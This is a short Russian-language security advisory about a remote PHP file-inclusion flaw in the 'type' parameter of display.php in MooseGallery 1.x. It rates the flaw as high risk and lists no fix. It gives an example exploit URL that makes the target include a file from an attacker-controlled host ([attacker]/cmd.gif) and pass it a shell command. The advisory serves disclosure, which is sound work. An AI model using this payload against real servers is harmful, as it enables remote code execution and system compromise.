PHP-инклюдинг в MooseGallery

Дата публикации:
19.07.2005
Дата изменения:
17.10.2006
Всего просмотров:
990
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
MooseGallery 1.x
Уязвимые версии: MooseGallery

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует в сценарии 'display.php' из-за недостаточной обработки входных данных в параметре 'type'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. Пример:

http://[target]/moosegallery/display.php?type=
http://[attacker]/cmd.gif?&cmd=[command]

URL производителя: pamplemoose.co.uk

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: MooseGallery Remote File Inclusion

или введите имя

CAPTCHA